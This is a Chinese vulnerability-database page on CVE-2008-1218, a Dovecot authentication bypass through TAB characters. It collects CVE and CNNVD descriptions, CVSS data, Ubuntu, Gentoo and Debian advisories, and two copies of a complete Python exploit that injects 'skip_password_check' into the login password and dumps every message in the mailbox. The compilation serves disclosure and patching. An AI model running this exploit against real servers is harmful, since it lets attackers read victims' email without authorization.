微慑信息网

CVE-2008-1218-漏洞详情

CVE-2008-1218
CVSS 6.8
发布时间 :2008-03-10 19:44:00
修订时间 :2011-03-07 22:06:20
NMCOEPS    

[原文]Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.


[CNNVD]Dovecot Tab 字符绕过口令检查漏洞和未授权访问漏洞(CNNVD-200803-106)

        Dovecot是Linux/UNIX类系统平台上的开源IMAP和POP3服务器。


        Dovecot对用户请求数据没有充分的检查过滤,远程攻击者可能利用此漏洞绕过验证获取非授权访问。


        Dovecot的内部协议使用TAB字符作为分隔符,但未经转义便发送了口令,因此如果口令中包含有TAB字符的话,就可以添加新的内部字段。如果用户在登录时通过这种方式添加了skip_password_check字段的话,就可以绕过口令检查,获得非授权登录。


        


CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]


CWE (弱点类目)

CWE-255 [凭证管理]


CPE (受影响的平台与产品)

cpe:/a:dovecot:dovecot:1.1:rc2
cpe:/a:dovecot:dovecot:1.0.12


OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:8054 DSA-1516 dovecot — privilege escalation
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。


官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1218

(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1218

(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200803-106

(官方数据源) CNNVD


其它链接及资源

https://issues.rpath.com/browse/RPL-2341


(UNKNOWN)  CONFIRM  https://issues.rpath.com/browse/RPL-2341
http://www.dovecot.org/list/dovecot-news/2008-March/000065.html


(UNKNOWN)  MLIST  [Dovecot-news] 20080309 v1.0.13 and v1.1.rc3 released
http://www.dovecot.org/list/dovecot-news/2008-March/000064.html


(UNKNOWN)  MLIST  [Dovecot-news] 20080309 Security hole #6: Some passdbs allowed users to log in without a valid password
http://secunia.com/advisories/32151


(UNKNOWN)  SECUNIA  32151
http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00004.html


(UNKNOWN)  SUSE  SUSE-SR:2008:020
https://www.redhat.com/archives/fedora-package-announce/2008-March/msg00381.html


(UNKNOWN)  FEDORA  FEDORA-2008-2475
https://www.redhat.com/archives/fedora-package-announce/2008-March/msg00358.html


(UNKNOWN)  FEDORA  FEDORA-2008-2464
https://issues.rpath.com/browse/RPL-2341


(UNKNOWN)  MISC  https://issues.rpath.com/browse/RPL-2341
http://xforce.iss.net/xforce/xfdb/41085


(UNKNOWN)  XF  dovecot-tab-authentication-bypass(41085)
http://www.ubuntulinux.org/support/documentation/usn/usn-593-1


(UNKNOWN)  UBUNTU  USN-593-1
http://www.securityfocus.com/bid/28181


(UNKNOWN)  BID  28181
http://www.securityfocus.com/archive/1/archive/1/489481/100/0/threaded


(UNKNOWN)  BUGTRAQ  20080312 rPSA-2008-0108-1 dovecot
http://www.milw0rm.com/exploits/5257


(UNKNOWN)  MILW0RM  5257
http://www.debian.org/security/2008/dsa-1516


(UNKNOWN)  DEBIAN  DSA-1516
http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0108


(UNKNOWN)  MISC  http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0108
http://security.gentoo.org/glsa/glsa-200803-25.xml


(UNKNOWN)  GENTOO  GLSA-200803-25
http://secunia.com/advisories/29557


(UNKNOWN)  SECUNIA  29557
http://secunia.com/advisories/29396


(UNKNOWN)  SECUNIA  29396
http://secunia.com/advisories/29385


(UNKNOWN)  SECUNIA  29385
http://secunia.com/advisories/29364


(UNKNOWN)  SECUNIA  29364
http://secunia.com/advisories/29295


(UNKNOWN)  SECUNIA  29295
http://secunia.com/advisories/29226


(UNKNOWN)  SECUNIA  29226


漏洞信息

Dovecot Tab 字符绕过口令检查漏洞和未授权访问漏洞
中危 信任管理
2008-03-10 00:00:00 2008-10-10 00:00:00
远程  
        Dovecot是Linux/UNIX类系统平台上的开源IMAP和POP3服务器。


        Dovecot对用户请求数据没有充分的检查过滤,远程攻击者可能利用此漏洞绕过验证获取非授权访问。


        Dovecot的内部协议使用TAB字符作为分隔符,但未经转义便发送了口令,因此如果口令中包含有TAB字符的话,就可以添加新的内部字段。如果用户在登录时通过这种方式添加了skip_password_check字段的话,就可以绕过口令检查,获得非授权登录。


        


公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:


        http://www.debian.org/security/2008/dsa-1516


        http://www.dovecot.org/list/dovecot-news/2008-March/000065.html


漏洞信息 (5257)

Dovecot IMAP 1.0.10 <= 1.1rc2 Remote Email Disclosure Exploit (EDBID:5257)
multiple remote
2008-03-14 Verified
0 Kingcope

N/A

[点击下载]

#lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit
#Here's an exploit for the recent TAB vulnerability in Dovecot.
#It's nothing special since in the wild there are few to none
#targets because of the special option which has to be set.
#see CVE Entry CVE-2008-1218
#Exploit written by Kingcope
import sys
import imaplib

print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit"
print "Prints out all E-Mails for any account if special configuration option is set"
print "Exploit written by kingcope\n"

if len(sys.argv)<3:
     print "usage: %s   [-nossl]" % sys.argv[0]
     exit(0);

if len(sys.argv)>3 and sys.argv[3] == "-nossl":
 M = imaplib.IMAP4(sys.argv[1])
else:
 M = imaplib.IMAP4_SSL(sys.argv[1])
M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\"");
M.select()
print "login succeeded."
typ, data = M.search(None, 'ALL')
k=0
for num in data[0].split():
    typ, data = M.fetch(num, '(RFC822)')
    print 'Message %s\n%s\n' % (num, data[0][1])
    k=k+1
M.close()
M.logout()
print "Messages read: %s" % k

# milw0rm.com [2008-03-14]
  


漏洞信息 (F64909)

Ubuntu Security Notice 593-1 (PacketStormID:F64909)

2008-03-26 00:00:00
Ubuntu  security.ubuntu.com

advisory

linux,ubuntu

CVE-2008-1199,CVE-2008-1218

[点击下载]

Ubuntu Security Notice 593-1 – It was discovered that the default configuration of dovecot could allow access to any email files with group “mail” without verifying that a user had valid rights. An attacker able to create symlinks in their mail directory could exploit this to read or delete another user's email. By default, dovecot passed special characters to the underlying authentication systems. While Ubuntu releases of dovecot are not known to be vulnerable, the authentication routine was proactively improved to avoid potential future problems.

=========================================================== 
Ubuntu Security Notice USN-593-1             March 26, 2008
dovecot vulnerabilities
CVE-2008-1199, CVE-2008-1218
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  dovecot-common                  1.0.beta3-3ubuntu5.6
  dovecot-imapd                   1.0.beta3-3ubuntu5.6
  dovecot-pop3d                   1.0.beta3-3ubuntu5.6

Ubuntu 6.10:
  dovecot-common                  1.0.rc2-1ubuntu2.3
  dovecot-imapd                   1.0.rc2-1ubuntu2.3
  dovecot-pop3d                   1.0.rc2-1ubuntu2.3

Ubuntu 7.04:
  dovecot-common                  1.0.rc17-1ubuntu2.3
  dovecot-imapd                   1.0.rc17-1ubuntu2.3
  dovecot-pop3d                   1.0.rc17-1ubuntu2.3

Ubuntu 7.10:
  dovecot-common                  1:1.0.5-1ubuntu2.2
  dovecot-imapd                   1:1.0.5-1ubuntu2.2
  dovecot-pop3d                   1:1.0.5-1ubuntu2.2

After a standard system upgrade, additional dovecot configuration changes
are needed.

ATTENTION: Due to an unavoidable configuration update, the dovecot
settings in /etc/dovecot/dovecot.conf need to be updated manually.
During the update, a configuration file conflict will be shown.
The default setting "mail_extra_groups = mail" should be changed to
"mail_privileged_group = mail".  If your local configuration uses groups
other than "mail", you may need to use the new "mail_access_groups"
setting as well.

Details follow:

It was discovered that the default configuration of dovecot could allow
access to any email files with group "mail" without verifying that a user
had valid rights.  An attacker able to create symlinks in their mail
directory could exploit this to read or delete another user's email.
(CVE-2008-1199)

By default, dovecot passed special characters to the underlying
authentication systems.  While Ubuntu releases of dovecot are not known
to be vulnerable, the authentication routine was proactively improved
to avoid potential future problems.  (CVE-2008-1218)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.beta3-3ubuntu5.6.diff.gz
      Size/MD5:   482805 f572acb482f90bb083314e880a772806
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.beta3-3ubuntu5.6.dsc
      Size/MD5:      867 f388415adecfb6e6b66821c601202954
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.beta3.orig.tar.gz
      Size/MD5:  1360574 5418f9f7fe99e4f10bb82d9fe504138a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.beta3-3ubuntu5.6_amd64.deb
      Size/MD5:   968546 0a9feb89c2b960cbb283a0a957c1ab3b
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.beta3-3ubuntu5.6_amd64.deb
      Size/MD5:   535154 c3fabd531b6c633a48ee9d3dfe5fbea9
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.beta3-3ubuntu5.6_amd64.deb
      Size/MD5:   503144 bb2ae9e81eb6188263827cb87cba29e7

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.beta3-3ubuntu5.6_i386.deb
      Size/MD5:   842602 3a3b5f8a056546dcad50211b6a66b17e
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.beta3-3ubuntu5.6_i386.deb
      Size/MD5:   487858 735fe4c9291d8f3e2f6ea93df9e6a722
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.beta3-3ubuntu5.6_i386.deb
      Size/MD5:   458548 a32d03a27e76610ef5e9a5b25adc369d

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.beta3-3ubuntu5.6_powerpc.deb
      Size/MD5:   946420 888fd964ff401c9436810f59a56c960e
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.beta3-3ubuntu5.6_powerpc.deb
      Size/MD5:   528892 65204a0f2de667fcc5bb7097c2973df9
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.beta3-3ubuntu5.6_powerpc.deb
      Size/MD5:   496616 8b71cb5999b41bd150d1427090f5266a

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.beta3-3ubuntu5.6_sparc.deb
      Size/MD5:   859702 096725e1d08fb32b4c30e4cb06a303ee
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.beta3-3ubuntu5.6_sparc.deb
      Size/MD5:   494022 69cb816c90fbc8c154860150beb54df1
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.beta3-3ubuntu5.6_sparc.deb
      Size/MD5:   464254 49ef9af48a8bcbc1b43cf64e579c8bac

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc2-1ubuntu2.3.diff.gz
      Size/MD5:   481921 30469a011f337d9ea2af0d5660cdc3bb
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc2-1ubuntu2.3.dsc
      Size/MD5:      900 103e47535573605f059bfe512bbe9e9d
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc2.orig.tar.gz
      Size/MD5:  1257435 e27a248b2ee224e4618aa2f020150041

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc2-1ubuntu2.3_amd64.deb
      Size/MD5:   941192 6d872ad2200983d3c6fb0af0af1689b4
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc2-1ubuntu2.3_amd64.deb
      Size/MD5:   389328 d249f6bee773d0302cb500107d5c30f1
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc2-1ubuntu2.3_amd64.deb
      Size/MD5:   355572 af818dec4a8102797efe010c52d2f3da

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc2-1ubuntu2.3_i386.deb
      Size/MD5:   837862 a2e1e5ab801a81bd7ede896c68b471dc
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc2-1ubuntu2.3_i386.deb
      Size/MD5:   356148 fe47879721273c223fdb02b820572c2d
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc2-1ubuntu2.3_i386.deb
      Size/MD5:   325538 930636d7b634b371ef7564a54f7ebbc8

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc2-1ubuntu2.3_powerpc.deb
      Size/MD5:   930236 0e501c64167c62697a6d35f77723f626
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc2-1ubuntu2.3_powerpc.deb
      Size/MD5:   387640 e383c12a8ae5f38f99b5605fe615d303
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc2-1ubuntu2.3_powerpc.deb
      Size/MD5:   354172 3b497cae8495e559124a8a32d0199fec

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc2-1ubuntu2.3_sparc.deb
      Size/MD5:   825242 483e84acb29649b05fd20b0516462e36
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc2-1ubuntu2.3_sparc.deb
      Size/MD5:   349766 ae08a2bc0af7693fd3eba475cdefea81
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc2-1ubuntu2.3_sparc.deb
      Size/MD5:   318894 b0962827bc67760168431aa08407c40a

Updated packages for Ubuntu 7.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc17-1ubuntu2.3.diff.gz
      Size/MD5:   110359 d45086b091902ffe4c897a37500640ef
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc17-1ubuntu2.3.dsc
      Size/MD5:     1100 2ebee5689361d891820080b8c03c1b80
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc17.orig.tar.gz
      Size/MD5:  1512386 881bcc7d2c8fba6d337f3e616a602bf7

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc17-1ubuntu2.3_amd64.deb
      Size/MD5:  1279482 7ca87aed81c784bc5fadcf51df7bb07b
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc17-1ubuntu2.3_amd64.deb
      Size/MD5:   589038 f7053e7a3037267a13de1b7d7daba6ae
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc17-1ubuntu2.3_amd64.deb
      Size/MD5:   554270 7f92ed3a933b775a6301b1d8723e60d0

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc17-1ubuntu2.3_i386.deb
      Size/MD5:  1169674 fc5fbc9f8b4c33fb2f773c7767625c79
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc17-1ubuntu2.3_i386.deb
      Size/MD5:   556308 13e0b06665a17c56da6d17ec3af892ca
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc17-1ubuntu2.3_i386.deb
      Size/MD5:   523676 681dd1951ef3d61b225930f9ba20f1d4

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc17-1ubuntu2.3_powerpc.deb
      Size/MD5:  1296474 b691fd7d6d5a5df7b08af8d732f806e1
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc17-1ubuntu2.3_powerpc.deb
      Size/MD5:   593374 77b2a2b0bf8f05c5fd8c03887dd0739d
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc17-1ubuntu2.3_powerpc.deb
      Size/MD5:   558844 03bde80aa2b1282c9131590cc530e68d

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc17-1ubuntu2.3_sparc.deb
      Size/MD5:  1163166 66565dbe0abf26fa13e1eae8d51f81f8
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc17-1ubuntu2.3_sparc.deb
      Size/MD5:   551744 d7858288e8326aad4cff410e5336ce1d
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc17-1ubuntu2.3_sparc.deb
      Size/MD5:   519076 45e334d300da1c76f5da042d0dbbfe44

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.5-1ubuntu2.2.diff.gz
      Size/MD5:   116694 c21b8fd1aa899cec34c5428d953ba992
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.5-1ubuntu2.2.dsc
      Size/MD5:     1115 74def18e831b00a23b5ee06f36634e55
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.5.orig.tar.gz
      Size/MD5:  1775898 94b7d29cf44f63f89d538361afa05c40

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.5-1ubuntu2.2_amd64.deb
      Size/MD5:  1822104 aebc0d840798e22dd1794b12f65fb65f
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.5-1ubuntu2.2_amd64.deb
      Size/MD5:   656608 d3ad8a6801d0be7060a2f57787cd93db
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.5-1ubuntu2.2_amd64.deb
      Size/MD5:   620032 ed96dadf810230c3f19fb1c07963b551

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.5-1ubuntu2.2_i386.deb
      Size/MD5:  1680262 d4014ff94fd68f928c8b91a2bfbf8143
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.5-1ubuntu2.2_i386.deb
      Size/MD5:   623590 2b42a167edcc0614b6f2b657319bda7d
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.5-1ubuntu2.2_i386.deb
      Size/MD5:   590130 2bab04499b1cbf80042248ba3250c585

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.5-1ubuntu2.2_powerpc.deb
      Size/MD5:  1840504 d989541e39e1ddad883537907502b0f4
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.5-1ubuntu2.2_powerpc.deb
      Size/MD5:   659636 cb7c4ca376b74c8e36ae80b14277c25d
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.5-1ubuntu2.2_powerpc.deb
      Size/MD5:   624332 022c275417a9ac846b5ed09eea225e84

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.5-1ubuntu2.2_sparc.deb
      Size/MD5:  1674688 798e926a5b6180a64fced9c592b38762
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.5-1ubuntu2.2_sparc.deb
      Size/MD5:   620580 9fb4843e505d09dcc0374b6bbc4dbb3b
    http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.5-1ubuntu2.2_sparc.deb
      Size/MD5:   587500 08bd76dc21c61c368b092d9c6d674e0a

    


漏洞信息 (F64681)

Gentoo Linux Security Advisory 200803-25 (PacketStormID:F64681)

2008-03-19 00:00:00
Gentoo  security.gentoo.org

advisory,arbitrary

linux,gentoo

CVE-2008-1199,CVE-2008-1218

[点击下载]

Gentoo Linux Security Advisory GLSA 200803-25 – Dovecot uses the group configured via the mail_extra_groups setting, which should be used to create lockfiles in the /var/mail directory, when accessing arbitrary files (CVE-2008-1199). Dovecot does not escape TAB characters in passwords when saving them, which might allow for argument injection in blocking passdbs such as MySQL, PAM or shadow (CVE-2008-1218). Versions less than 1.0.13-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Dovecot: Multiple vulnerabilities
      Date: March 18, 2008
      Bugs: #212336, #213030
        ID: 200803-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two vulnerabilities in Dovecot allow for information disclosure and
argument injection.

Background
==========

Dovecot is a lightweight, fast and easy to configure IMAP and POP3 mail
server.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /   Vulnerable   /                   Unaffected
    -------------------------------------------------------------------
  1  net-mail/dovecot      < 1.0.13-r1                    >= 1.0.13-r1

Description
===========

Dovecot uses the group configured via the "mail_extra_groups" setting,
which should be used to create lockfiles in the /var/mail directory,
when accessing arbitrary files (CVE-2008-1199). Dovecot does not escape
TAB characters in passwords when saving them, which might allow for
argument injection in blocking passdbs such as MySQL, PAM or shadow
(CVE-2008-1218).

Impact
======

Remote attackers can exploit the first vulnerability to disclose
sensitive data, such as the mail of other users, or modify files or
directories that are writable by group via a symlink attack. Please
note that the "mail_extra_groups" setting is set to the "mail" group by
default when the "mbox" USE flag is enabled.

The second vulnerability can be abused to inject arguments for internal
fields. No exploitation vectors are known for this vulnerability that
affect previously stable versions of Dovecot in Gentoo.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Dovecot users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-mail/dovecot-1.0.13-r1"

This version removes the "mail_extra_groups" option and introduces a
"mail_privileged_group" setting which is handled safely.

References
==========

  [ 1 ] CVE-2008-1199
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1199
  [ 2 ] CVE-2008-1218
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1218

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-25.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[email protected] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
    


漏洞信息 (F64608)

dovecot-disclose.txt (PacketStormID:F64608)

2008-03-15 00:00:00
Kingcope  

exploit,remote,imap,info disclosure

CVE-2008-1218

[点击下载]

Dovecot IMAP versions 1.0.10 through 1.1rc2 remote email disclosure exploit.

#lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit
#Here's an exploit for the recent TAB vulnerability in Dovecot.
#It's nothing special since in the wild there are few to none
#targets because of the special option which has to be set.
#see CVE Entry CVE-2008-1218
#Exploit written by Kingcope
import sys
import imaplib

print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit"
print "Prints out all E-Mails for any account if special configuration option is set"
print "Exploit written by kingcope\n"

if len(sys.argv)<3:
     print "usage: %s   [-nossl]" % sys.argv[0]
     exit(0);

if len(sys.argv)>3 and sys.argv[3] == "-nossl":
 M = imaplib.IMAP4(sys.argv[1])
else:
 M = imaplib.IMAP4_SSL(sys.argv[1])
M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\"");
M.select()
print "login succeeded."
typ, data = M.search(None, 'ALL')
k=0
for num in data[0].split():
    typ, data = M.fetch(num, '(RFC822)')
    print 'Message %s\n%s\n' % (num, data[0][1])
    k=k+1
M.close()
M.logout()
print "Messages read: %s" % k

    


漏洞信息 (F64601)

Debian Linux Security Advisory 1516-1 (PacketStormID:F64601)

2008-03-15 00:00:00
Debian  debian.org

advisory

linux,debian

CVE-2008-1199,CVE-2008-1218

[点击下载]

Debian Security Advisory 1516-1 – Prior to this update, the default configuration for Dovecot used by Debian runs the server daemons with group mail privileges. This means that users with write access to their mail directory by other means (for example, through an SSH login) could read mailboxes owned by other users for which they do not have direct write access. In addition, an internal interpretation conflict in password handling has been addressed pro-actively, even though it is not known to be exploitable.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------------------------
Debian Security Advisory DSA-1516-1                [email protected]
http://www.debian.org/security/                         Florian Weimer
March 14, 2008                      http://www.debian.org/security/faq
- ----------------------------------------------------------------------

Package        : dovecot
Vulnerability  : privilege escalation
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-1199 CVE-2008-1218
Debian Bug     : 469457

Prior to this update, the default configuration for Dovecot used by
Debian runs the server daemons with group mail privileges.  This means
that users with write access to their mail directory by other means
(for example, through an SSH login) could read mailboxes owned by
other users for which they do not have direct write access
(CVE-2008-1199).  In addition, an internal interpretation conflict in
password handling has been addressed proactively, even though it is
not known to be exploitable (CVE-2008-1218).

Note that applying this update requires manual action: The
configuration setting "mail_extra_groups = mail" has been replaced
with "mail_privileged_group = mail".  The update will show a
configuration file conflict in /etc/dovecot/dovecot.conf.  It is
recommended that you keep the currently installed configuration file,
and change the affected line.  For your reference, the sample
configuration (without your local changes) will have been written to
/etc/dovecot/dovecot.conf.dpkg-new.

If your current configuration uses mail_extra_groups with a value
different from "mail", you may have to resort to the
mail_access_groups configuration directive.

For the stable distribution (etch), these problems have been fixed in
version 1.0.rc15-2etch4.

For the unstable distribution (sid), these problems have been fixed in
version 1.0.13-1.

For the old stable distribution (sarge), no updates are provided.
We recommend that you consider upgrading to the stable distribution.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.dsc
    Size/MD5 checksum:     1300 8146ccf246ed64e1ac8c0127489ec798
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15.orig.tar.gz
    Size/MD5 checksum:  1463069 26f3d2b075856b1b1d180146363819e6
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.diff.gz
    Size/MD5 checksum:   102991 21959fc45cf0f8932fa9eb890791ff39

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_alpha.deb
    Size/MD5 checksum:   583482 a0d18885da096140ceb4110d525569d4
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_alpha.deb
    Size/MD5 checksum:  1379844 6103bce830848d3f9bb4347f5c9b94f0
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_alpha.deb
    Size/MD5 checksum:   621320 48127903af1fe2130cb84c57e5a607ff

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_amd64.deb
    Size/MD5 checksum:  1222430 1c2e1ffeb6bf745ed88cde01c62d264a
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_amd64.deb
    Size/MD5 checksum:   536634 4f64ed0cc16510e9c3d709342b3c57ca
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_amd64.deb
    Size/MD5 checksum:   569588 c17bac715f188f55ae20e5a3c95109b1

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_arm.deb
